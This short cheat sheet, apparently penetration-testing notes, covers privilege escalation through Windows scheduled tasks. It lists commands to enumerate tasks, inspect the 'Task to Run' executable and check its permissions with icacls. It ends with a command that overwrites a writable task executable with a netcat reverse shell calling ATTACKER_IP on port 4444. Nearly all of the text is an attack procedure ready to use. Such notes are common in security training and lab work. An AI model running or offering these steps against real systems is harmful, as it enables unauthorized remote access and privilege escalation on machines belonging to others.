Scheduled tasks

List tasks

schtasks

Gather information about a task

We look for "Task to Run" executable.

schtasks /query /tn <VULN TASK> /fo list /v

Check for file permissions

icacls <TASK TO RUN>

If we have write permission on the executable, we can edit it.

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > <TASK TO RUN>